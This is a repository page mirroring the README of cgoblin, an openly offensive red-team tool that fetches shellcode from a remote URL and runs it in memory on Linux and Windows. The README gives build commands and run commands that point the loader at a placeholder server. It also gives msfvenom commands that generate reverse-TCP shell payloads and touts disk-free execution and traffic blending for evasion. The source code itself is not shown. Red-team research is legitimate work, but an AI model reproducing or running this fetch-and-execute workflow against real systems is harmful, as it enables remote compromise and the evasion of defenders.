https://github.com/grisuno/cgoblin
cgoblin run shellcode from an url in windows and linux
https://github.com/grisuno/cgoblin
hacking lazyown linux msfvenom-friendly multiplatform redteam remote shellcode shellcode-loader windows
Last synced: 5 months ago
JSON representation
cgoblin run shellcode from an url in windows and linux
- Host: GitHub
- URL: https://github.com/grisuno/cgoblin
- Owner: grisuno
- License: gpl-3.0
- Created: 2025-08-02T05:00:00.000Z (5 months ago)
- Default Branch: main
- Last Pushed: 2025-08-02T06:48:40.000Z (5 months ago)
- Last Synced: 2025-08-02T08:06:39.106Z (5 months ago)
- Topics: hacking, lazyown, linux, msfvenom-friendly, multiplatform, redteam, remote, shellcode, shellcode-loader, windows
- Language: Go
- Homepage: https://grisuno.github.io/LazyOwn/
- Size: 57.6 KB
- Stars: 0
- Watchers: 0
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- Contributing: CONTRIBUTING.md
- License: LICENSE
- Code of conduct: CODE_OF_CONDUCT.md
- Security: SECURITY.md
Awesome Lists containing this project
README
# ๐ง CGOblin โ Cross-Platform Shellcode Loader
**cgoblin** is a lightweight, cross-platform shellcode loader written in Go, capable of fetching and executing shellcode from a remote URL on both **Linux** and **Windows** systems. It leverages inline C via CGO to allocate executable memory and run position-independent machine code.
> ๐ *For educational and red teaming purposes only.*
---
## ๐ฆ Repository
- **URL**: [https://github.com/grisuno/cgoblin.git](https://github.com/grisuno/cgoblin.git)
- **Author**: [grisuno](https://github.com/grisuno)
- **Team**: LazyOwn RedTeam
---
## ๐ Features
- โ
Cross-platform support (Linux & Windows)
- โ
Remote shellcode loading via HTTP(S)
- โ
Shellcode parsing from `\xNN` hex format
- โ
Memory allocation with execution permissions:
- Uses `mmap()` on Linux
- Uses `VirtualAlloc()` on Windows
- โ
Minimal footprint and no disk staging (in memory only)
- โ
Custom User-Agent and secure HTTP client settings
---
## Prerequisites
**CGOblin** requires a multi-language development environment supporting both Go and Python, with CGO compilation capabilities for system-level memory operations.
### Core Requirements
Component Version Purpose
- Go 1.24.2+ Core application runtime and compilation
- Python 3.x Launcher script and development utilities [OPTIONAL]
- CGO Enabled System call interface for memory operations
- GCC/Clang Latest C compiler for CGO compilation
## ๐ ๏ธ Usage
### Build
```bash
# Linux
GOOS=linux go build -o loader_linux main.go loader_linux.go
```
```bash
# Windows
GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build -o loader_windows.exe
```
๐ก Ensure CGO is enabled: CGO_ENABLED=1 (default when supported).
```bash
# Linux
# Example
./loader_linux -url http://your-server.com/shellcode.txt
```
```bash
# Windows
# Example
powershell .\loader_windows.exe -url http://your-server.com/shellcode.txt
```
```bash
# shellcode
# Example
unsigned char buf[] = "\x6a\x29\x58\x99\x...";
```
โ ๏ธ The loader parses only sequences matching \x.. and ignores everything else.
```bash
# shellcode
# Example Linux
msfvenom -p linux/x64/shell_reverse_tcp LHOST={lhost} LPORT={lport} -f c -o shellcode_test.txt
```
```bash
# shellcode
# Example Windows
msfvenom -p windows/x64/shell_reverse_tcp LHOST={lhost} LPORT={lport} -f c -o shellcode_test.txt
```
```text
# Tree
# Example
.
โโโ go.mod # Go module definition
โโโ main.go # Entry point with CLI flag parsing
โโโ loader_linux.go # Linux-specific execution logic (CGO + mmap)
โโโ loader_windows.go # Windows-specific execution logic (CGO + VirtualAlloc)
โโโ shellcode_linux.txt # Example Linux shellcode (bind/reverse shell)
โโโ shellcode_win.txt # Example Windows shellcode (e.g., Calc or Cmd)
```
๐ Example shellcode files are provided for testing (non-malicious use recommended).
## ๐งช Testing Safely
- To test without risk:
- Host a simple shellcode (e.g., execve("/bin/sh") on Linux or WinExec("calc.exe") on Windows).
- Use local HTTP server:
```bash
# Webserver
# Example
python3 -m http.server 8000
```
## Security and Operational Considerations
### cgoblin implements several security-conscious design patterns:
- Memory-only operations: No temporary files are created during shellcode processing
- Custom HTTP headers: Configurable User-Agent strings to blend with legitimate traffic
- Input validation: Shellcode size limits and format verification
- Platform isolation: Platform-specific code paths prevent cross-contamination
- CGO safety: Proper memory management in C interface layers
## External Framework Integration
### Relevant source files
Purpose and Scope This document covers how **CGOblin** integrates with external exploitation frameworks and automation systems. The integration system allows external tools to automatically configure, build, and execute the shellcode loader with dynamically generated payloads. This capability enables **CGOblin** to function as a component within larger penetration testing suites and automated exploitation frameworks.
For information about the core shellcode loading functionality, see Core Shellcode Loader System. For details about the build system that supports framework integration, see Build System.
### Framework Integration Architecture
The external framework integration system uses a YAML-based configuration approach that defines how external tools can interact with **CGOblin**. The integration supports parameter-driven payload generation and automated execution workflows.
## ๐ Disclaimer
This tool is intended for:
- Security research
- Red team operations
- Authorized penetration testing
- Do not use for unauthorized access or malicious purposes. The author and team assume no liability for misuse.
## Compliance Framework
Users of cgoblin must ensure compliance with:
- Local Computer Crime Laws: Unauthorized access laws vary by jurisdiction
- Professional Ethics: Penetration testing codes of conduct
- Contractual Obligations: Scope limitations in security assessments
- Data Protection Regulations: Privacy laws when handling target systems
## ๐ค Team: LazyOwn RedTeam
A dedicated red team focused on offensive security, exploit development, and defensive evasion techniques.
"We break it to make it better โ ethically."
## ๐ License
This project is open-source for educational use. See LICENSE for details (**GPLv3**).
# Links
- [+] **gomulti_loader** the little brother of **CGOblin**: [https://github.com/grisuno/gomulti_loader](https://github.com/grisuno/gomulti_loader)
- [+] Shorts: [https://www.youtube.com/shorts/kPZvVV_RNIE](https://www.youtube.com/shorts/kPZvVV_RNIE)
- [+] Deepwiki: [https://deepwiki.com/grisuno/cgoblin](https://deepwiki.com/grisuno/cgoblin)
- [+] Github: [https://github.com/grisuno/LazyOwn](https://github.com/grisuno/LazyOwn)
- [+] Web: [https://grisuno.github.io/LazyOwn/](https://grisuno.github.io/LazyOwn/)
- [+] Reddit: [https://www.reddit.com/r/LazyOwn/](https://www.reddit.com/r/LazyOwn/)
- [+] Facebook: [https://web.facebook.com/profile.php?id=61560596232150](https://web.facebook.com/profile.php?id=61560596232150)
- [+] HackTheBox: [https://app.hackthebox.com/teams/overview/6429 ](https://app.hackthebox.com/teams/overview/6429 )
- [+] Grisun0: [https://app.hackthebox.com/users/1998024](https://app.hackthebox.com/users/1998024)
- [+] Patreon: [https://patreon.com/LazyOwn ](https://patreon.com/LazyOwn )
- [โ] Download: [https://github.com/grisuno/LazyOwn/archive/refs/tags/release/0.2.47.tar.gz ](https://github.com/grisuno/LazyOwn/archive/refs/tags/release/0.2.47.tar.gz )
   [](https://www.gnu.org/licenses/gpl-3.0)
[](https://ko-fi.com/Y8Y2Z73AV)